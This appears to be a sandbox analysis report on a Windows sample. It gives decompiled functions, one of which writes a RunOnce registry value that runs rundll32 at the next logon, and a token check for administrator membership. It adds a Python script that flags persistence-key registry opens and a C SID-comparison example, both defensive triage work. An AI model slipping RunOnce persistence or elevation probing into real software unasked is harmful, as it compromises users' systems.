  • Part of subcall function 0019681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001968CC
  • Part of subcall function 0019681F: RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,?,0000000C), ref: 001968F4
  • Part of subcall function 0019681F: RegCloseKey.ADVAPI32(?), ref: 00196902
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$doza2
• API String ID: 3244514340-3130468218
• Opcode ID: 026c37637e73c64bae36e2fe1913d4719c42b5a0e1c4299526cbb30cf69046f3
• Instruction ID: c98adcf7f07deb83c0fd862b0c8d26dafdfca78eff8ec24c3c824616fa155ef0
• Opcode Fuzzy Hash: 026c37637e73c64bae36e2fe1913d4719c42b5a0e1c4299526cbb30cf69046f3
• Instruction Fuzzy Hash: 05510472900215ABDF219F68CC48FBA7B79EF46300F1541A5FD49A7241DB31DE4ACBA0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 94%
// Decompiler output (Joe Sandbox IDA plugin). Comments added by the editor describe
// what the visible control flow does; helper bodies (E00191781, E0019658A, E00191680,
// E00196CE0) are not on this page, so their roles below are inferred from how they are called.
//
// Resolves the name in _a4 into a full path written to the caller's 0x104-byte buffer (__ecx):
//   no leading '#'                       -> <system directory> joined with <name>
//   '#', 'S', one separator char, <name> -> <system directory> joined with <name>
//   '#', 'W', one separator char, <name> -> <windows directory> joined with <name>
//   '#', any other letter, sep, <name>   -> default value of
//        HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\<name>
//        (REG_EXPAND_SZ is expanded first; if the key or value is missing, <name> is appended as-is)
// Returns 1 when a usable App Paths value was found, else 0.
E00192773(CHAR* __ecx, char* _a4) {
	signed int _v8;
	char _v268;
	char _v269;
	CHAR* _v276;
	int _v280;
	void* _v284;
	int _v288;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t23;
	intOrPtr _t34;
	int _t45;
	int* _t50;
	CHAR* _t52;
	int _t59;      // used below but left undeclared by the decompiler
	CHAR* _t61;
	char* _t62;
	int _t63;
	CHAR* _t64;
	signed int _t65;

	_t52 = __ecx;
	_t23 =  *0x198004; // 0x21bd9a3c  (security cookie)
	_v8 = _t23 ^ _t65;  // stack-cookie setup, checked again in the epilogue
	_t62 = _a4;
	_t50 = 0;           // result flag: 1 only when a registry value was accepted
	_t61 = __ecx;       // output buffer
	_v276 = _t62;       // name to resolve (defaults to the whole argument)
	 *((char*)(__ecx)) = 0;
	if( *_t62 != 0x23) {  // no '#' prefix
		_t63 = 0x104;
		goto L14;
	} else {
		_t64 = _t62 + 1;
		_v269 = CharUpperA( *_t64);              // type letter after '#'
		_v276 = CharNextA(CharNextA(_t64));      // skip the letter and one separator char
		_t63 = 0x104;
		_t34 = _v269;
		if(_t34 == 0x53) {  // 'S'
			L14:
			GetSystemDirectoryA(_t61, _t63);
			goto L15;
		} else {
			if(_t34 == 0x57) {  // 'W'
				GetWindowsDirectoryA(_t61, 0x104);
				goto L16;
			} else {
				_push(_t52);
				_v288 = 0x104;  // output size in bytes for RegQueryValueExA
				// Build "Software\Microsoft\Windows\CurrentVersion\App Paths" + "\" + <name> in _v268
				E00191781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
				_t59 = 0x104;
				E0019658A( &_v268, 0x104, _v276);
				// 0x80000002 = HKEY_LOCAL_MACHINE, 0x20019 = KEY_READ
				if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
					L16:
					_t59 = _t63;
					E0019658A(_t61, _t63, _v276);  // fall back: join <name> onto the buffer
				} else {
					// 0x191140: pointer into .rdata; assumed to be "" (the key's default value)
					if(RegQueryValueExA(_v284, 0x191140, 0,  &_v280, _t61,  &_v288) == 0) {
						_t45 = _v280;  // value type
						if(_t45 != 2) {  // not REG_EXPAND_SZ
							L9:
							if(_t45 == 1) {  // REG_SZ: use the value as-is
								goto L10;
							}
						} else {
							if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
								_t45 = _v280;
								goto L9;
							} else {
								_t59 = 0x104;
								E00191680(_t61, 0x104,  &_v268);  // copy the expanded string back to the buffer
								L10:
								_t50 = 1;
							}
						}
					}
					RegCloseKey(_v284);
					L15:
					if(_t50 == 0) {
						goto L16;
					}
				}
			}
		}
	}
	return E00196CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);  // cookie check + epilogue, result in _t50
}























Per-line instruction addresses for the decompiled function above, in listing order (the sandbox's address column; 0x00000000 marks lines with no mapped instruction):
0x00192773 0x0019277e 0x00192785 0x0019278a 0x0019278d 0x00192790 0x00192792 0x00192798
0x0019279d 0x001928b2 0x00000000 0x001927a3 0x001927a3 0x001927af 0x001927c2 0x001927c8
0x001927cd 0x001927d5 0x001928b7 0x001928b9 0x00000000 0x001927db 0x001927dd 0x001928aa
0x00000000 0x001927e3 0x001927e3 0x001927ec 0x001927f8 0x00192803 0x0019280b 0x00192831
0x001928c3 0x001928c9 0x001928cd 0x00192837 0x0019285a 0x0019285c 0x00192865 0x00192892
0x00192895 0x00000000 0x00000000 0x00192867 0x00192878 0x0019288c 0x00000000 0x0019287a
0x00192880 0x00192885 0x00192897 0x00192899 0x00192899 0x00192878 0x00192865 0x001928a0
0x001928bf 0x001928c1 0x00000000 0x00000000 0x001928c1 0x00192831 0x001927dd 0x001927d5
0x001928e5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharUpperA.USER32(21BD9A3C,00000000,00000000,00000000), ref: 001927A8
                                                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 001927B5
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 001927BC
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192829
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192852
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192870
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001928A0
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001928AA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 001928B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001927E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                    • Opcode ID: babb4de967b8c46bfc525f747231ba40f46acd715997f363614e55fc4f78b590
                                                                                                                                                                                                                                    • Instruction ID: 383a8234aaeca7e35423bd0170d949d946dcb89d701cceb7d4ebcc34d4606f61
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: babb4de967b8c46bfc525f747231ba40f46acd715997f363614e55fc4f78b590
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77419071E00128BFDF249B649C85AFA7BBDEF55700F5440AAFA49D2110DB709EC68FA1
Uniqueness
• Uniqueness Score: -1.00%
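The API list above shows what this function does: it opens HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths with samDesired 0x20019 (KEY_READ), queries a value, expands environment strings in the result, and otherwise falls back to GetWindowsDirectoryA / GetSystemDirectoryA. In other words it resolves a bare executable name through App Paths, so whoever controls an App Paths entry controls what the lookup returns. The sample's cleanup routine decompiled in this report opens HKLM\...\RunOnce with 0x2001f (KEY_READ | KEY_WRITE) instead. The script below is an added example, not Joe Sandbox tooling and not code from the sample: it parses API lines in the report's own "• Api.MODULE(args), ref: ADDR" format, decodes the HKEY root and access mask of each registry open, and flags opens of persistence or hijackable keys. Its input is constructed: three lines are copied from this section, and the RunOnce line is built to mirror the decompiled RegOpenKeyExA call, with a hypothetical ref address.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function listing and decode registry opens.

Added example for this report: not Joe Sandbox tooling and not the sample's code.
"""
import re
from dataclasses import dataclass

# Constructed input. Lines 1, 2 and 4 are copied from the listing above; line 3 is
# CONSTRUCTED to mirror the RegOpenKeyExA call in the decompiled cleanup routine
# (HKLM\...\RunOnce opened with 0x2001f) and its ref address is hypothetical.
SAMPLE_API_LINES = [
    "• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,"
    "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths), ref: 00192829",
    "• RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,-00000005,?,?,"
    "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths), ref: 00192852",
    "• RegOpenKeyExA.ADVAPI32(80000002,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,"
    "00000000,0002001F,?), ref: 00192300",
    "• GetSystemDirectoryA.KERNEL32 ref: 001928B9",
]

# "• Api.MODULE(args), ref: ADDR" or "• Api.MODULE ref: ADDR" (no arguments recovered)
_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

# winreg.h: KEY_READ = 0x20019, KEY_WRITE = 0x20006, KEY_ALL_ACCESS = 0xF003F
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
_SPECIFIC_RIGHTS = (("KEY_QUERY_VALUE", 0x1), ("KEY_SET_VALUE", 0x2), ("KEY_CREATE_SUB_KEY", 0x4),
                    ("KEY_ENUMERATE_SUB_KEYS", 0x8), ("KEY_NOTIFY", 0x10), ("KEY_CREATE_LINK", 0x20))

# Keys worth a second look: Run/RunOnce persistence, App Paths executable resolution (hijackable)
PERSISTENCE_KEYS = (r"\\CurrentVersion\\RunOnce$", r"\\CurrentVersion\\Run$", r"\\CurrentVersion\\App Paths$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int


def parse_api_line(line):
    """Return an ApiCall for one report line, or None if the line is not an API entry."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def decode_hkey(value):
    return HKEY_ROOTS.get(value, "0x%08X" % value)


def decode_reg_access(mask):
    """Name a samDesired mask the way winreg.h composes it (KEY_READ, KEY_WRITE, ...)."""
    if mask == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    names, rest = [], mask & 0xFFFF   # registry-specific bits; 0x20000 is STANDARD_RIGHTS_READ/WRITE
    for name, bits in (("KEY_READ", KEY_READ & 0xFFFF), ("KEY_WRITE", KEY_WRITE & 0xFFFF)):
        if rest & bits == bits:
            names.append(name)
            rest &= ~bits
    names += [name for name, bit in _SPECIFIC_RIGHTS if rest & bit]
    leftover = mask & ~0xFFFF & ~0x20000
    if leftover:
        names.append("0x%X" % leftover)
    return "|".join(names) or "0"


def registry_opens(calls):
    """Summarise every RegOpenKeyEx*/RegCreateKeyEx* call: root, subkey, rights, hunt flags."""
    out = []
    for c in calls:
        if not c.api.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) or len(c.args) < 4:
            continue
        # Parameter order: hKey, lpSubKey, ulOptions, samDesired, phkResult. The sandbox prints
        # "?" for unresolved values and appends recovered stack strings after the formals, so
        # when lpSubKey is "?" take the last path-looking trailing string as the subkey.
        root = decode_hkey(int(c.args[0], 16)) if c.args[0] != "?" else "?"
        subkey = c.args[1]
        if subkey == "?":
            paths = [a for a in c.args[5:] if "\\" in a]
            subkey = paths[-1] if paths else "?"
        rights = decode_reg_access(int(c.args[3], 16)) if c.args[3] != "?" else "?"
        out.append({
            "ref": "0x%08X" % c.ref, "root": root, "subkey": subkey, "rights": rights,
            "persistence_key": any(re.search(p, subkey) for p in PERSISTENCE_KEYS),
            "writes": "KEY_WRITE" in rights or rights == "KEY_ALL_ACCESS",
        })
    return out


if __name__ == "__main__":
    for entry in registry_opens([c for c in map(parse_api_line, SAMPLE_API_LINES) if c]):
        flag = "HUNT" if entry["persistence_key"] and entry["writes"] else "info"
        print(f'{flag:4} {entry["ref"]} {entry["root"]}\\{entry["subkey"]} [{entry["rights"]}]')
```

Two caveats when using this as a triage aid. The sandbox only records the App Paths open with KEY_READ, so that line is an "info" entry: it tells you the binary trusts App Paths for name resolution, which matters if you are assessing hijack exposure on a host, not that the sample tampers with it. The RunOnce open is the line to chase, but a legitimate IExpress package produces the same wextract_cleanup RunOnce value, so treat the hit as a lead to be confirmed against the value data and the dropped payload, not as a verdict on its own.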

C-Code - Quality: 62%
			// Cleanup-scheduling routine. The value name "wextract_cleanup3", the IXP003.TMP
			// extraction directory and the "advpack.dll,DelNodeRunDLL32" command line are the
			// pattern used by Microsoft's wextract.exe (IExpress self-extractor) stub, which
			// registers a RunOnce value so its temp directory is deleted at the next logon.
			E00192267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x198004; // 0x21bd9a3c  (security cookie; _v8 is the stack canary)
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x198530 != 0) {
					_push(_t49);
					// 0x80000002 = HKEY_LOCAL_MACHINE, 0x2001f = KEY_READ | KEY_WRITE
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						// the value name (?str?) was not recovered by the decompiler; the rest runs only if this query succeeds
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0019658A( &_v268, 0x104, 0x191140); // appends the string at 0x191140 to the system directory path
							}
							// the literal path is the analysis machine's own temp directory, captured at run time
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							// sprintf-style: rundll32.exe <sysdir>advpack.dll,DelNodeRunDLL32 "<extraction dir>"
							E0019171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do { // inline strlen(_v836); _t42 - _t45 + 1 below is the length including the NUL
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							// REG_SZ (type 1) write of the RunOnce value: the persistence/cleanup artefact to hunt for
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00196CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                    			}
0x00192272
0x00192277
0x00192279
0x00192283
0x00192289
0x001922ab
0x001922b1
0x001922c4
0x001922e0
0x001922e6
0x001922f5
0x0019230d
0x0019231c
0x0019231c
0x00192321
0x0019233a
0x00192342
0x00192348
0x0019234b
0x0019234c
0x0019234c
0x0019234e
0x0019234f
0x0019236e
0x0019236e
0x0019237a
0x00192380
0x00192380
0x00192381
0x00192381
0x0019238f

APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001922A3
• RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 001922D8
• memset.MSVCRT ref: 001922F5
• GetSystemDirectoryA.KERNEL32 ref: 00192305
• RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0019236E
• RegCloseKey.ADVAPI32(?), ref: 0019237A
Strings
• C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00192321
• Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00192299
• wextract_cleanup3, xrefs: 0019227C, 001922CD, 00192363
• rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0019232D
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Value$CloseDirectoryOpenQuerySystemmemset
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
• API String ID: 3027380567-1707933020
• Opcode ID: 4d4619245fc2150ae98e98e56f5a88f5a18e026319aa667f585c8d7092464c23
• Instruction ID: 423799fe88587344b739a35db78d43a7b9a7c282b628a1eac04eb077ccbe6174
• Opcode Fuzzy Hash: 4d4619245fc2150ae98e98e56f5a88f5a18e026319aa667f585c8d7092464c23
• Instruction Fuzzy Hash: 99319371A00218BBDF219B65DC49FEA7B7CEF59740F4401AAF50DE6051EB71AF88CA90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E00193100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x198590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x198590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E001943D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x198d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x1988b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E001930C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

APIs
• EndDialog.USER32(?,00000000), ref: 0019313B
• GetDesktopWindow.USER32 ref: 0019314B
• SetDlgItemTextA.USER32(?,00000834), ref: 0019316A
• SetWindowTextA.USER32(?,doza2), ref: 00193176
• SetForegroundWindow.USER32(?), ref: 0019317D
• GetDlgItem.USER32(?,00000834), ref: 00193185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00193190 (index 0xFFFFFFFC is GWL_WNDPROC: reads the current window procedure of the control fetched by GetDlgItem just before)
• SetWindowLongA.USER32(00000000,000000FC,001930C0), ref: 001931A3 (GWL_WNDPROC again: subclasses that control with the procedure at 001930C0)
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001931CA (message 0xB1 is EM_SETSEL, an edit-control message, so control 0x834 is an edit box)
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: doza2
• API String ID: 3785188418-612509477
• Opcode ID: 8602a0b3a0d40fe2cc255cdedbc3821d6d470a0df9fd53a7f7532240eabc95e2
• Instruction ID: 27bc4c927435b567ab4d2afdec71bd900b1ec323962b579187710f89557f3fe1
• Opcode Fuzzy Hash: 8602a0b3a0d40fe2cc255cdedbc3821d6d470a0df9fd53a7f7532240eabc95e2
• Instruction Fuzzy Hash: 4A11B131648221BBDF116F249C0CB9A3AA4FF4B720F500632F835D19F0DB719A85C796
Uniqueness
Uniqueness Score: -1.00%

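The next listing, E001918A3, opens the current process token with TOKEN_QUERY, sizes and then fetches its TokenGroups buffer, and builds a SID from SECURITY_NT_AUTHORITY with the two sub-authorities 0x20 and 0x220. The comparison of that SID against the group list lies beyond the visible part of the listing. The C below is an added example, not the sample's own code and not Joe Sandbox output: it reimplements the SID layout and EqualSid-style comparison without Windows headers so it runs anywhere, shows that those constants spell S-1-5-32-544 (BUILTIN\Administrators), and walks a constructed TokenGroups-like list the way a conventional admin check does. The group walk, the SE_GROUP_ENABLED test and the two constructed tokens are the example's own assumptions about what the truncated function goes on to do, not something the report shows.

```c
/* Added example (not from the analysed sample or from Joe Sandbox).
 * Portable reimplementation of the SID handling behind the decompiled
 * AllocateAndInitializeSid(&nt_authority, 2, 0x20, 0x220, ...) call. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SID_MAX_SUB 15

typedef struct {
    uint8_t  revision;          /* SID_REVISION, always 1 */
    uint8_t  sub_count;
    uint8_t  authority[6];      /* 48-bit identifier authority, big-endian on the wire */
    uint32_t sub[SID_MAX_SUB];  /* sub-authorities (RIDs) */
} sid_t;

/* SECURITY_NT_AUTHORITY: the decompiled code writes it as _v16.Value = 0
 * followed by the 16-bit store _v12 = 0x500, i.e. bytes {0,0,0,0,0,5}. */
static const uint8_t NT_AUTHORITY[6] = {0, 0, 0, 0, 0, 5};

/* Mirrors AllocateAndInitializeSid: authority plus n sub-authorities. */
static int sid_init(sid_t *s, const uint8_t auth[6], int n, const uint32_t *subs)
{
    if (n < 1 || n > SID_MAX_SUB) return 0;
    memset(s, 0, sizeof *s);
    s->revision = 1;
    s->sub_count = (uint8_t)n;
    memcpy(s->authority, auth, 6);
    memcpy(s->sub, subs, (size_t)n * sizeof *subs);
    return 1;
}

/* Equivalent of EqualSid: revision, count, authority and every sub-authority. */
static int sid_equal(const sid_t *a, const sid_t *b)
{
    if (a->revision != b->revision || a->sub_count != b->sub_count) return 0;
    if (memcmp(a->authority, b->authority, 6) != 0) return 0;
    return memcmp(a->sub, b->sub, a->sub_count * sizeof a->sub[0]) == 0;
}

/* Renders the S-1-5-32-544 form that ConvertSidToStringSid would produce. */
static void sid_to_string(const sid_t *s, char *out, size_t cap)
{
    uint64_t auth = 0;
    for (int i = 0; i < 6; i++) auth = (auth << 8) | s->authority[i];
    int n = snprintf(out, cap, "S-%u-%llu", (unsigned)s->revision, (unsigned long long)auth);
    for (int i = 0; i < s->sub_count && n >= 0 && (size_t)n < cap; i++)
        n += snprintf(out + n, cap - (size_t)n, "-%u", (unsigned)s->sub[i]);
}

/* Stand-in for one SID_AND_ATTRIBUTES entry of the TokenGroups buffer. */
#define SE_GROUP_ENABLED           0x00000004u
#define SE_GROUP_USE_FOR_DENY_ONLY 0x00000010u
typedef struct { sid_t sid; uint32_t attributes; } group_t;

/* Assumed continuation of the decompiled function: walk the groups and
 * require the wanted SID to be present AND enabled (a deny-only entry,
 * as in a UAC-filtered token, must not count). */
static int token_has_enabled_group(const group_t *groups, int count, const sid_t *wanted)
{
    for (int i = 0; i < count; i++)
        if (sid_equal(&groups[i].sid, wanted) && (groups[i].attributes & SE_GROUP_ENABLED))
            return 1;
    return 0;
}

/* Returns 1 when BUILTIN\Administrators (0x20 = SECURITY_BUILTIN_DOMAIN_RID,
 * 0x220 = DOMAIN_ALIAS_RID_ADMINS) is an enabled group of the token. */
static int is_admin_token(const group_t *groups, int count)
{
    sid_t admins;
    uint32_t rids[2] = {0x20, 0x220};
    sid_init(&admins, NT_AUTHORITY, 2, rids);
    return token_has_enabled_group(groups, count, &admins);
}

/* Constructed sample tokens (not captured from the sample): BUILTIN\Users
 * plus Administrators, the latter enabled only when elevated. */
static int build_sample_token(group_t *g, int elevated)
{
    uint32_t users[2]  = {0x20, 0x221};   /* DOMAIN_ALIAS_RID_USERS */
    uint32_t admins[2] = {0x20, 0x220};
    sid_init(&g[0].sid, NT_AUTHORITY, 2, users);
    g[0].attributes = SE_GROUP_ENABLED;
    sid_init(&g[1].sid, NT_AUTHORITY, 2, admins);
    g[1].attributes = elevated ? SE_GROUP_ENABLED : SE_GROUP_USE_FOR_DENY_ONLY;
    return 2;
}

int main(void)
{
    group_t g[2];
    char buf[64];
    sid_t admins;
    uint32_t rids[2] = {0x20, 0x220};
    sid_init(&admins, NT_AUTHORITY, 2, rids);
    sid_to_string(&admins, buf, sizeof buf);
    printf("AllocateAndInitializeSid(NT, 2, 0x20, 0x220) -> %s\n", buf);
    int n = build_sample_token(g, 1);
    printf("elevated token: is_admin=%d\n", is_admin_token(g, n));
    n = build_sample_token(g, 0);
    printf("filtered token: is_admin=%d\n", is_admin_token(g, n));
    return 0;
}
```

Why the attribute test matters: under UAC a non-elevated administrator's filtered token still carries S-1-5-32-544, flagged SE_GROUP_USE_FOR_DENY_ONLY. A check that only looks for the SID's presence reports such a process as elevated; a check that also demands SE_GROUP_ENABLED (which is what CheckTokenMembership does for you) does not. Whether the sample gets this right cannot be told from the visible part of the listing.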
C-Code - Quality: 91%
			E001918A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x198004; // 0x21bd9a3c
				_v8 = _t23 ^ _t53; // MSVC /GS stack-cookie pattern; rechecked by E00196CE0 on every exit
				_t25 =  *0x198128; // 0x2 - cached result of this check; 2 means "not computed yet"
				_t45 = 0;
				_v12 = 0x500; // together with _v16.Value = 0 this fills the 6-byte authority with {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY
				_t50 = 2; // reused below as TokenGroups (TOKEN_INFORMATION_CLASS 2) and as the sub-authority count
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00196CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51); // cookie check + epilogue
				}
				if(E001917EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x198128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) { // 8 = TOKEN_QUERY
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) { // size probe: success or anything but 0x7a = ERROR_INSUFFICIENT_BUFFER is unexpected
					L17:
